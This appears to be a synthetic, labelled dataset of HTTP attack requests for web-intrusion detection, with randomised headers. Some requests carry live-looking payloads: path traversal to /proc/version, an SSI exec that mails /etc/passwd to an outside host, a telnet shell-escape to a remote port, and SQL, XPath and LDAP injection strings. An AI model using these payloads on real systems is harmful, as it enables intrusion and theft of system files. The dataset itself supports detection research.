Max-Forwards: 101
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic bnJvM3Q6Um5vczU=
Range: 798895-
Referer: /8xohnre.rar
TE: trailers
Trailer: Warning
User-Agent: tVUK@F http://www.eddtan.biz
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6318x7597
Via: 6.3 58.231.90.251:38, 6.1 84.0.90.187
Transfer-Encoding: compress
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 337 166.46.236.159 "olmOlIzulsOaexht7zh" "Wed, 19 Mar 08 23:51:06 UTC"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38683
Start - Id: 46323
class: PathTransversal
GET /nMXMlQvCZWTr/nmmCS8rWxoIkl.asp?Nnbyouiu0Du=%40xrondreesystemrprocessing-instruction%5C+%26&wdeleteftpm_kev=anobjectgeTid%2F&tH56=69mTfcp&tidamshitvd=4p%3Ft&ta1q2ha=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&MyTpo=hhzsnorxI HTTP/1.0
Host: 87.216.239.127
Connection: close
Accept: image/*, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=644
Client-ip: 146.96.8.202
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="67"
Date: Sat, 20 Aug 05 23:52:57 GMT
ETag: "csbZDEq4M4._0-0s2jK"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Thu, 09 Apr 09 21:41:43 UTC
If-Match: "1swgFq-Ny_tsuC94bX"
If-None-Match: *
If-Range: *
Max-Forwards: 957
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: Digest nonce
Range: 595-7160,98-,4-961
Referer: http://hFejisW.be/xyiibj/n6ltioaA/uneE.mspx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: eep5nyhiez/7.1
UA-CPU: Sparc
UA-Disp: 776,0792,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 9.9 18.229.218.182, sbc/5.8 62.111.81.18
Transfer-Encoding: deflate
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 036028433584
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46323
Start - Id: 48389
class: XPathInjection
GET /-1U_hQDbgsound-8/yevt7Sw/aGy7eJ/@f3a0Q/aITvrnwuTmcnmtpi4gt/BQXovKRN.K/riuOzCOBV8euG.bin?iq6tesstciNa=qlsuehgnu&ehaonmtteeheba=0033822 HTTP/1.0
Host: 168.38.14.49
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 80.72.57.200
Cookie: mfjt3T=61222 or ikaQtn/to/e/child::node()[position()=8]    or    985=
Cookie2: $Version="67"
Date: Sun, 27 Nov 05 06:28:22 GMT
ETag: W/"ndQ@1iNc9l0XA2HMWF."
Expect: 100-continue
From: n56he@s5yangs.gov
If-Modified-Since: Sat, 01 May 10 17:56:36 UTC
If-Unmodified-Since: Tue, 27 Sep 05 01:53:30 UTC
If-Match: *
If-None-Match: *
If-Range: "T9nlCoHesKkBXDU"
Max-Forwards: 4004
MIME-Version: 2.9
Pragma: 5='o'
Proxy-Authorization: Basic YWttY29hajp0b2Zh
Authorization: NTLM NWFoZE81bjhzbm5ua2xsdEVlNGhya2VhZHd0dGE0ZGZob24=
Range: 6-4347,22520-
Referer: /s7jil.conf
TE: trailers,chunked;q=0.8,trailers
Trailer: Max-Forwards
User-Agent: ha4to/4.9
UA-CPU: Sparc
UA-Disp: 998,4488,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 128x9065
Via: FTP/8.8 www.arrt.htm:5, o53/9.1 84.143.77.184, HTTP/2.9 www.rloadfn.css:3
Transfer-Encoding: compress
Upgrade: drca/7.4, zeot/7.9, sjnA/1.3, wIv/9.0
Warning: 786 www.daesswae.htm:80 "siohedrathsatet1ree" "Mon, 21 Jan 08 01:15:32 UTC"
X-Serial-Number: 631643747373
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 48389
Start - Id: 37993
class: LdapInjection
GET /w7qswmnsrkk9/i0tUdSWGyMs2./f3utzatuieh/4TIuQOgLJqxh8Cr.nsf?th2=open-dd&dsfb=45&nnR=9&UOa4nLM0unionT@2=atma%29%28%26%28objectClass%3D+7e*%29&E9ti3dpcD=715&Kxg9jOdropHL=+i&snhd5d=160087&tjlrihS=unQ1pN%40vqw&qeep=taelnIpaiframei2eMe5&nhsddpXiHtIeno=lzortrozhFsmThn4 HTTP/1.0
Host: 99.35.37.136
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: max-stale=12849
Client-ip: 115.116.216.130
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="53"
Date: Sun, 07 Feb 10 10:48:58 GMT
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: trtssn1@Ndseosl4.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Thu, 03 Jun 04 13:40:34 GMT
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: "RpgM_ktljotBNhz0n5rD"
Max-Forwards: 2467
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="dAd5FcB57E0C5AB9ea90BC841f0938cc"
Range: 4893-,-7197
Referer: /hBdp/nttee/aLttf/9mtseuhd.swf
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: iaeo/2.3
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 880x8476
Via: 7.3 www.rOqbhho.jpeg, HTTP/0.3 www.qhtikz.jpeg, FTP/2.1 212.39.138.78
Transfer-Encoding: compress
Upgrade: 9aaia/6.6
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 71.96.26.80
X-Serial-Number: 800649
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37993
Start - Id: 39927
class: SSI
POST /qT.Y8m.OY426IJY/ei/tQuhTB3Qh6/OJ.Mo/2pTHLFjcr-Y5/rnoKh1rWJ5MRtp/58t4sehneda1fixluet/1g6sgw/neoqylmioo.js? HTTP/1.1
Content-Length: 143
Content-Language: ay
Content-Encoding: deflate
Content-Location: http://eiYsls.ch/b5ar.png
Content-MD5: M2wzYW90YWd0YVFmZ3RycQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Nov 09 03:35:18 GMT
Last-Modified: Fri, 04 May 07 11:04:42 UTC
Host: www.auheb.fr
Connection: maOtlrbi
Accept: */*;q=0.7
Accept-Charset: windows-1253;q=0.1, utf-7;q=0.1, windows-874;q=0.5, iso-8859-9;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 101.181.0.245
Cookie: .H_0Kwindow.openIT=251;hM2ireeebe=t+v/nsT(bdivlehnS6;ahnwceoEpctoiy=oxVrX;documentqkrE_3HAU=te ymhavingdr
Cookie2: $Version="36"
Date: Thu, 25 Mar 04 21:55:09 UTC
ETag: "7R2aU4_ypGn5n9WA"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Sat, 01 Nov 08 03:20:57 UTC
If-Match: "gssuUYT8PYMHjt4Af_"
If-None-Match: *
If-Range: "MIApyNYKDy81AJ4Ryyd7"
Max-Forwards: 253
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: vse5 LnTu5icu=otlnt
Authorization: Digest username="eseT3sEl"
Range: 065804-4,-22740,4181-
Referer: /mul5d9/u5Ee3df.cgi
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 0.1; d4-jr; rv:6.9.6) Gecko/34028096
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 625x1975
Via: 3.8 www.hsNlTas.png, 5.6 11.43.48.63:41, aoAdz/3.0 www.atji.jpeg:6939
Transfer-Encoding: gzip
Upgrade: rZos/0.7, seee/7.7, tpcri/7.2, yeGh/9.2, etshoj/4.1
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

supng3hsaig=674312&rdibedneoa=4&aeTiofgctmioof=<!--    #exec    cmd="/bin/mail    rrrStba.com     <     /etc/passwd"-->

End - Id: 39927
Start - Id: 42173
class: SqlInjection
GET /gCareeee/shMPyGWyNY0/a6_qXBA7B8aE/hIOv@NSVoKI72Rha/neush3hMad3gayui/MGF/3aGFqKj3O4AwVg3/fTtdwlUynar/OEQHcfkcatpd/eYjIHON@Ke/nPk2CFkuav9/eI6U4vZZx.jsp?otoneornets=3&nmlc=11231&ru0=itQI&dropGHUb=oioniegBtabei6&mpbd=syto9fknO&enako2tfm=83&AmlRenMante=73319&Ieaemftrd=4489481&ge7NyDsBuStcr=nng%5Dnrlikenz%29em&eo=e-UTMGWPx&HnpIqjF=%27select+++++customer_phone+++%27%7C%7C%27from++++customers++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+++++lv_surname%7C%7C%27%27%27++++and+customer_type%3D1%27%3B&petwudlan=vtRddsERonajnil&1xOPEfromJqYu=tx8CR9wQOIdO HTTP/1.1
Host: www.ordnh.net:8085
Connection: kehnzeS
Accept: video/mpeg;q=0.0
Accept-Charset: us-ascii;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 36.147.99.223
Cookie: ddtiaoo=6;sRs3gr5d=rrns;t4uoiy=YxbaTteE e)egit;Q3jnBypK=Enyd;cNAnadt=15anastoGmailc
Cookie2: $Version="4"
Date: Thu, 08 Sep 05 15:06:06 CET
ETag: "rmoKgaJRhzxXhz04d"
Expect: uonhe=heuanl
From: hmrl@wdteioa4s.uk
If-Modified-Since: Sat, 14 Apr 07 21:10:42 UTC
If-Unmodified-Since: Mon, 04 Feb 08 09:38:11 UTC
If-Match: *
If-None-Match: *
If-Range: "MaNbJCEuM_ftW1Ee"
Max-Forwards: 5617
MIME-Version: 5.3
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM QWVldHJ1bXNzSHdYMHRicGp0b3l1Z2FuaWlyaG5pY2hyVGFndg==
Range: 1010-
Referer: /4Sbidoc2/enmcNxts.sh
TE: gzip;q=0.9,gzip
Trailer: Proxy-Authorization
User-Agent: Ubdasnltotry8rnwO
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: gzip
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42173
Start - Id: 44218
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.petsf.biz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253;q=0.3, macintosh;q=0.2, macintosh, iso-2022-jp;q=0.0
Accept-Encoding: 
Accept-Language: vsw-it;q=0.7, jc3pns-an4;q=0.3, eaNs1-OjpMqeoi;q=0.7, c-as, icEaNu-bHw1eD
Cache-Control: min-fresh=9009
Client-ip: 48.142.236.180
Cookie: coit4elcsbneac=228;c0uwe2e=5596737
Cookie2: $Version="370"
Date: Sun, 18 Apr 10 07:04:08 CET
ETag: "@p2buksFXGXLgt8"
Expect: et2ess1=aa0davZ;sinntl
From: rOaz@gEadsxsee.biz
If-Modified-Since: Sat, 23 Aug 08 05:22:59 CET
If-Unmodified-Since: Tue, 27 Apr 04 11:13:00 UTC
If-Match: *
If-None-Match: *
If-Range: "1TVFAbk1gVPvL1D"
Max-Forwards: 6119
MIME-Version: 1.8
Pragma: zadee='l'
Proxy-Authorization: Basic aXROTzN0OmZlaWM=
Authorization: Digest qop=i8kedAln
Range: 09660-850419
Referer: /on4e.png
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: mp6T-8T5 http://www.9hxi.fr
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x848
Via: 8.1 198.77.239.197
Transfer-Encoding: gzip
Upgrade: eeiw/8.3, Tc4cy/9.9, ciigE/9.1
Warning: 268 161.222.182.214 "sxsom" 
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 77570647240448229537
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44218
Start - Id: 49276
class: XPathInjection
GET /zARJJ1Pyqpopen9F1/eosSf/oLKeazmfD/udoI2hiodrhoyqm/ppassthruak7qTl8having/TpRd33redo2s/RVtxs76te/h7ei/z-XUa4Tsq/ioa.cgi?erbecpiDLe=nes&2nhonisAetars=9078&t0ec=48117050&em=gyIhaB5X&v9s=a%27&dw6Uaeldweve=oR1e&ih4oSatLnhrv=teVoScgtbhza4taSy&ikdrRsats=epsP%24%5Boperlvarmsl8&tedAyoo=8t%27+or+++++%28i++++%3C+count%280r%2Fchild%3A%3Atext%28%29%29++and+++++j+++++%3C++count%28Md%2Fchild%3A%3Acomment%28%29%29+++and++k++++%3C+++++count%28gA%2Fchild%3A%3A*%29++%29+++or++%27idah%27++++%3D%27++8cttxg%27+or&pnem79ulapg=41&ieWoir=875&qRFpassthru.P-pbgsoundY9=-s-%27wp&9irwrtybh8otc=195136&from.GTCmI=4ip&ta9rehomex=-+ HTTP/1.1
Host: www.Ateorp.be
Connection: Sniom
Accept: */*
Accept-Charset: iso-8859-9;q=0.6, euc-kr
Accept-Encoding: deflate
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 135.225.50.169
Cookie: nzr=:ibetweene+
Cookie2: $Version="037"
Date: Wed, 14 Feb 07 09:05:12 UTC
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 13 Sep 08 22:08:48 UTC
If-Unmodified-Since: Sat, 28 Jul 07 04:59:46 GMT
If-Match: "K2Yn5Nj@JULkEXe"
If-None-Match: "wHnvcYP2A52kht@BYD4P"
If-Range: "zffv5BtAyOTFQc2yf6"
Max-Forwards: 457
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 8-,-6,95877-955
Referer: http://www.hass.it/deihha.nsf
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 1.0; no-2r; rv:6.5.6) Gecko/87742856
UA-CPU: StrongARM
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: FTP/9.7 144.243.219.213, oDael/3.5 www.8aQcmS.css
Transfer-Encoding: gzip
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49276
Start - Id: 44121
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 82.215.110.226
Connection: keep-alive
Accept: image/jpeg, video/mpeg
Accept-Charset: x-mac-cyrillic;q=0.8, x-mac-roman, koi8-r;q=0.8, euc-cn, x-mac-greek;q=0.3
Accept-Encoding: identity, identity;q=0.8, gzip;q=0.6, compress;q=0.0, compress
Accept-Language: *
Cache-Control: min-fresh=962
Client-ip: 178.250.250.231
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="066"
Date: Sat, 12 Mar 05 21:23:16 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Thu, 27 Apr 06 12:55:33 CET
If-Unmodified-Since: Sun, 18 Jan 09 09:25:20 CET
If-Match: "j9e46Ez3xia0xsD"
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: Sat, 11 Apr 09 13:22:06 GMT
Max-Forwards: 840
MIME-Version: 9.5
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 6-5561
Referer: /Supaao0/e7vEin/rwet/gSRee/hexcit.mspx
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.5 (X11; U; Open BSD i586 4.5; oo-ad; rv:4.2.4) Gecko/00514374
UA-CPU: x86
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44121
Start - Id: 44853
class: PathTransversal
GET /esI7DbACXLzwqDI/eHvii/m7dphsehebrtf/RneeersSene/hclh9/t9g4tHxFb30/sRallM1soNdV5eP5A@Lk/iU/fQGhM/11kEfa19VWk.nsf?nOrRukuBLY=cj9fy&460FqyFk=ouzrmled++cci&btfnRaewoo=aoEtid&1@uallr04iframer=cyaptAgooebr&itmeyiu=a5aTYm4BWt_&xr=frliltenqeQ&tod1iuohnlreefl=3812&e0ltme=twinnt&tfeh=u2M&70netcath81xperl4UO=ehonon&tna7ctEMH8so=hh&pthet=403&wgets.bm67yMF=file%3A%2F%2F%2Fu%3A%2Fto%2Fomt%2Fsb0lhocx.xml&1a=43position&a9Mau=vtrxa HTTP/1.0
Host: www.spse0aa24.fr
Connection: close
Accept: text/*;q=0.3, application/x-tar, image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n-tyghc, Bit4E-stOdOmts;q=0.2, o-E;q=0.2
Cache-Control: min-fresh=45
Client-ip: 99.178.36.179
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="89"
Date: Wed, 14 Apr 10 02:09:36 CET
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: eloob=qdejeads
From: netotmi@oanhTettwr.cz
If-Modified-Since: Tue, 04 Apr 06 05:37:57 UTC
If-Unmodified-Since: Mon, 12 Feb 07 22:41:03 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Nov 05 09:04:19 GMT
Max-Forwards: 063
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: Basic YURvZWU6cG5uNG53bnI=
Range: 3752-,303-8,-33345
Referer: http://www.ctehtesh.de/dvejtt/fhpnat.msf
TE: trailers,trailers,gzip;q=0.8
Trailer: From
User-Agent: nwieei9cvw/3.0.1.2.4
UA-CPU: StrongARM
UA-Disp: 5979,4863,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: oqt0/3.7 198.89.166.1, 2.2 www.cqoett.css, 9.5 www.rihywu.jpg
Transfer-Encoding: identity
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44853
Start - Id: 48768
class: XPathInjection
GET /edvumcj5mcr59Urwn/g63shNJxq6-SP/iuRl0aseoiraiwtceouh/mK.gif?sr=huhaIw%27+++or++++sh7%2Fnaout%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D785%5D++or+++++%27yeiam1%27%3D+%27&lkhhilbaEboo=1&onUatonc=%3CTcfuwp-eobwEe%29tdw&eqcbsastsus=3531403&toetevetooed=01&nFvn=soi+6p&3lP.=69753 HTTP/1.0
Host: www.6tey.st
Connection: close
Accept: */*;q=0.0
Accept-Charset: gb2312, windows-874;q=0.5
Accept-Encoding: 
Accept-Language: r-ldwra, tpo-wS, 0-a, l-Tzr;q=0.8, Tce-rtsTiEh;q=0.0
Cache-Control: min-fresh=28
Client-ip: 232.245.220.245
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Tue, 13 Nov 07 09:28:38 UTC
ETag: "JPkHbt63LZW@TgBTvjUE"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Tue, 01 Feb 05 02:03:34 GMT
If-Unmodified-Since: Fri, 19 Mar 04 08:16:29 UTC
If-Match: *
If-None-Match: "2BhulWHOWbizh6GahDZf"
If-Range: Sun, 05 Apr 09 24:39:05 UTC
Max-Forwards: 263
MIME-Version: 1.8
Pragma: a7raot='8nrwBMl'
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Basic cElhbDplZWljMUVl
Range: -333764,-7
Referer: http://8taprSvH.uk/9TDgrnfu/a0fcous.mp3
TE: deflate,gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: enbocce (aDIR@X; oA9eAaYk; hx8IxMC@; c-3zbTHdM8; u0cPg74)
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: gzip
Upgrade: neds/2.0, 5aphe/6.1, hee/8.3
Warning: 888 www.io8tthl.html "cqrmosn5run4ip" "Sat, 20 Jan 07 18:20:32 CET"
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48768
Start - Id: 44753
class: PathTransversal
GET /OwtimsuDtkcDgfgs/e0Li60OkFRVy3zHj/9mEKFb4BxzTJ3VL-64.mspx?sirhtgsa=babgeoo48ae&dssCieia0=fsoeya&6In=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&eaklswt9bi1A=843&SFhwld2YF8=o%5C%5Bv+iee&s1EyiTv9Rw2sDus=6&ic=Iortde%26rtsse&ttVnenipermay=3376&jgHWoAkCu9mc=+%3Beg3&btgeNlk=9111&gacsgaw4inaRsa=TethLifysuaoiMsT&insertFnF@UbOCOn=peooEednka%26ntsga6&vlArereNdfFgv=ngfSjsdeaswheor&i7koreoiwslfv=+&lfqlcDaoahvr1Tw=626 HTTP/1.1
Host: 139.25.54.29
Connection: natlts
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, gzip;q=0.0, deflate, deflate;q=0.3, deflate;q=0.9
Accept-Language: *;q=0.9
Cache-Control: haea='efx'
Client-ip: 245.254.197.131
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="60"
Date: Sun, 22 Jul 07 21:21:13 CET
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: SIzOu3
From: c4tkn@Etnnohc.it
If-Modified-Since: Sun, 12 Jun 05 22:47:11 CET
If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "Al_M2p86uSFudm_HScc-"
If-None-Match: "hWBAETg7jpDTDFR"
If-Range: *
Max-Forwards: 8678
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://www.crorh5j.de/hsdToon/cmbhjk.php4
Range: 027680-5,4627-
Referer: /ienleky/agci/oeSyh/zL7cem/h8ua.dll
TE: chunked;q=0.4
Trailer: TE
User-Agent: Mozilla/2.8 (X11; U; Linux i586 4.9; do-ar; rv:8.3.8) Gecko/61197625
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: Qya/6.2
Warning: 079 www.n1cn.tiff "meawmehgeEqekttk" "Tue, 06 Jul 04 17:24:32 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44753
Start - Id: 43443
class: OsCommanding
GET /bg85z4sS2/sd3v87/aJDIYRSP6e/sTCAE/it4s8nop3lE/tun1RDGAz7x/eEeeoOnoOaEhcifN/s6UeesotvwiO/sqclC7lEtYth17/netcat0Xln.jsp?6ht=4&eo0w=c+D&0epca4ce4d=06&X3.1=s2H_KdB&oliLu=7214&lbr=R%2F&no3ai8igsrehme=%5C%22%5C%3B+%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.trlltingoris.com++6750%5C%3B&krh=%3FnuIghcati+%3Co2ie1or&H6iosGm=window.open0 HTTP/1.1
Host: 140.65.252.101
Connection: hsx3hi
Accept: image/jpeg
Accept-Charset: iso-8859-1, x-mac-cyrillic;q=0.4, windows-874, x-mac-arabic;q=0.3, iso-8859-6
Accept-Encoding: *;q=0.7
Accept-Language: eg-idofoa;q=0.0, 3bt-haoiP, ts-hodGYign
Cache-Control: eosEt=u8eeray
Client-ip: 87.24.160.134
Cookie: 4iiIpf=scdwoh1logwgettt@eari;c7st=seconnecti: o+p %0Xlinkdbgsound
Cookie2: $Version="848"
Date: Sat, 30 Jun 07 22:05:39 CET
ETag: W/"J3rodTGe@9EySOL0.e"
Expect: a9incnt
From: TsoHtl@c9ggR2do.cz
If-Modified-Since: Mon, 16 Feb 09 09:19:44 CET
If-Unmodified-Since: Mon, 12 Jul 04 03:12:43 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 11 Oct 07 14:49:18 CET
Max-Forwards: 8
MIME-Version: 4.0
Pragma: e=ale
Proxy-Authorization: Digest qop=alb2ja0
Authorization: VPri otoheooh=enai
Range: -0418,311-
Referer: http://www.t9oa.org/yGeeneyE/snunc/fbrcztaE/aNsl.pdf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.6 (Machintosh; U; PPC 8.9; Ty-ea; rv:7.9.5) Gecko/36587590
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: 1.3 www.rzt5j.css:0185, 0.5 121.254.86.178, 4.8 www.aoe7uh.js
Transfer-Encoding: gzip
Upgrade: M4r/6.8, Aiye/1.9, wtraey/9.2, Ana/1.3, Na5he/7.8
Warning: 641 202.173.246.46 "aerLri" "Tue, 03 Aug 04 10:59:47 GMT"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43443
Start - Id: 42792
class: SqlInjection
POST /mrLdU_vdJRqKN/tuR7t7V5Mh51.z350/i5E7J6m1.ZipXBwI.nsf? HTTP/1.0
Content-Length: 324
Content-Language: j,hihi
Content-Encoding: identity
Content-Location: /wwao/ncrt5.gif
Content-MD5: aGFyTGplYXNzb2FlaTVlZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Feb 09 10:05:22 CET
Last-Modified: Thu, 20 Jan 05 05:49:26 CET
Host: 206.210.3.203:80
Connection: yttO
Accept: video/quicktime, application/*;q=0.5, audio/*;q=0.7
Accept-Charset: iso-8859-2, x-mac-arabic;q=0.7, koi8;q=0.1, iso-2022-jp
Accept-Encoding: compress, compress;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 106.46.255.142
